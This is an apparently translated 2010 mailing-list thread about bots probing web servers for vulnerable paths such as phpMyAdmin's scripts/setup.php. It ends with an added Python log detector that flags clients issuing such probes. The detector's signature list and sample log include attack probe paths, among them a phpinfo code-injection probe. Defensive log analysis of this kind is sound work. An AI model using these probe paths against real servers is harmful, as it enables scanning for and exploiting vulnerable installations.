Re: [OT] Search patterns used by spider robots in directories
Wed, 8 Dec 2010, Pablo Zuñiga:
Dear all:
I want to share the following observation, touching a bit on the
security topic: I have noticed that there are some web robots (spider
robots) that always look for the same directories.
Most of them have the following structure:
/phpMyAdmin-2.6.3/scripts/setup.php 4
/remat/tendon165.php 4
/phpMyAdmin-2.6.2-rc1/scripts/setup.php 4
/remat/tanning96.php 4
/remat/system49.php 4
/remat/texas207.php 4
/phpmanager/scripts/setup.php 3
/phpmyadmin1/scripts/setup.php 3
/remat/theater235.php 3
/mysql-admin/scripts/setup.php 3
/remat/syndrome18.php 3
/remat/texas201.php 3
/phpMyAdmin-2/scripts/setup.php 3
/web/scripts/setup.php 3
/admin/phpmyadmin/scripts/setup.php 3
/remat/tennis171.php 3
/sqlweb/scripts/setup.php 3
The robots.txt files are disabled so they can crawl and index. Has
anyone looked further into this kind of behaviour? I checked whether,
within the directories that get created on Debian servers, we would find
the same subdirectory structure, so I conclude that it is aimed more at
custom installations in some Windows environment, although I don't know
whether other distros work that way.
It makes no difference whether you have "robots.txt" enabled or disabled,
because what the "little spiders" you mention are looking for are
vulnerabilities in certain services, and they don't respect such niceties.
I suppose there will be some module for the web server to block these
attacks, but as long as you don't have one of the vulnerable products and
versions installed at one of the paths they look for, you shouldn't
worry. ?:-)
To give you an idea of the number and volume of these attacks, here are
some paths that get a 404 on a small server:
--
Regards --- Angel
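Both posts describe the same thing: scanners requesting known vulnerable paths (the phpMyAdmin setup.php probes in the first message, the 404 list in the reply) regardless of robots.txt. The following is an added example, not code from either poster: a small detector that reads combined-format access log lines and reports clients that hit several such probe paths and got a 404. The probe signatures, the IP addresses and the log lines are constructed for the example.

```python
import re
from collections import defaultdict
# Combined log format (Apache/nginx). Constructed sample lines below.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

# Assumed probe signatures: the phpMyAdmin setup.php probe from the thread plus a few others.
PROBE_PATTERNS = [re.compile(p, re.I) for p in (
    r'/scripts/setup\.php$',              # phpMyAdmin 2.x setup script
    r'config\.inc\.php\?p=phpinfo\(\);',  # PHP config include probe
    r'/bin/msgimport$',                   # Roundcube
    r'/chat/messagesL\.php3$',            # phpMyChat
    r'awstats\.pl$',                      # AWStats CGI
    r'w00tw00t',                          # well-known scanner banner request
)]

def parse_line(line):
    """Return {'ip', 'path', 'status'} for a combined-format line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {'ip': m.group('ip'), 'path': m.group('path'), 'status': int(m.group('status'))}

def is_probe(path):
    return any(p.search(path) for p in PROBE_PATTERNS)

def scan_clients(lines, min_probes=3):
    """Map client IP -> probed paths for clients with >= min_probes 404s on probe paths.
    Counting only 404s keeps legitimate admins of an installed product out of the report."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec['status'] == 404 and is_probe(rec['path']):
            hits[rec['ip']].append(rec['path'])
    return {ip: paths for ip, paths in hits.items() if len(paths) >= min_probes}

# Constructed sample log: one scanner, one normal visitor, one single stray probe.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Dec/2010:10:15:32 +0000] "GET /phpMyAdmin-2.6.3/scripts/setup.php HTTP/1.1" 404 512 "-" "Mozilla/4.0"
203.0.113.5 - - [08/Dec/2010:10:15:33 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 512 "-" "Mozilla/4.0"
203.0.113.5 - - [08/Dec/2010:10:15:34 +0000] "GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 512 "-" "Mozilla/4.0"
203.0.113.5 - - [08/Dec/2010:10:15:35 +0000] "GET /roundcube//bin/msgimport HTTP/1.1" 404 512 "-" "Mozilla/4.0"
198.51.100.7 - - [08/Dec/2010:10:16:01 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Dec/2010:10:16:02 +0000] "GET /about.php HTTP/1.1" 404 512 "-" "Mozilla/5.0"
192.0.2.9 - - [08/Dec/2010:10:17:10 +0000] "GET /scripts/setup.php HTTP/1.1" 404 512 "-" "curl/7.21"
""".splitlines()

if __name__ == '__main__':
    for ip, paths in scan_clients(SAMPLE_LOG).items():
        print(ip, len(paths), 'probes:', ', '.join(paths))
```

Feed it `access.log` lines instead of SAMPLE_LOG to get a per-client list you can hand to a firewall or fail2ban-style blocker; the threshold avoids flagging a visitor who mistyped one URL.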